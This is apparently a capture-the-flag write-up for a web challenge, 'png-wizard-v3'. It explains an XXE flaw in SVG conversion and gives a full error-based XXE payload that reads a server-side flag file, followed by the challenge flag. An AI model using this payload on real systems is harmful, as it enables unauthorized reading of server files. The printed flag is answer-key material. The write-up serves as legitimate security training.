Web Exploitation

png-wizard-v3 (8 solves)

Description

Now with support for modern image formats!

Solution

When we try to upload SVG file the response is Error converting file: Unknown image kind .PNG.

By checking on reportlab 3.6.12 source code we can see that the error caused by invalid format/extension for saved file. Valid format should be PNG not .PNG .

Loooking at source code, we can see that there is XXE vulnerability while parsing the SVG data. But since we can't download the rendered file we can't do common XXE.

<!DOCTYPE svg [ 
  <!ELEMENT message ANY >
  <!ENTITY % NUMBER '<!ENTITY &#x25; file SYSTEM "file:///proc/self/cwd/flag.txt">
  <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%NUMBER;
]><svg width="2048px" height="1024px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="40" x="40" y="40">&xxe;</text></svg>

Flag : flag{are_you_really_a_wizard_if_you_dont_use_magick}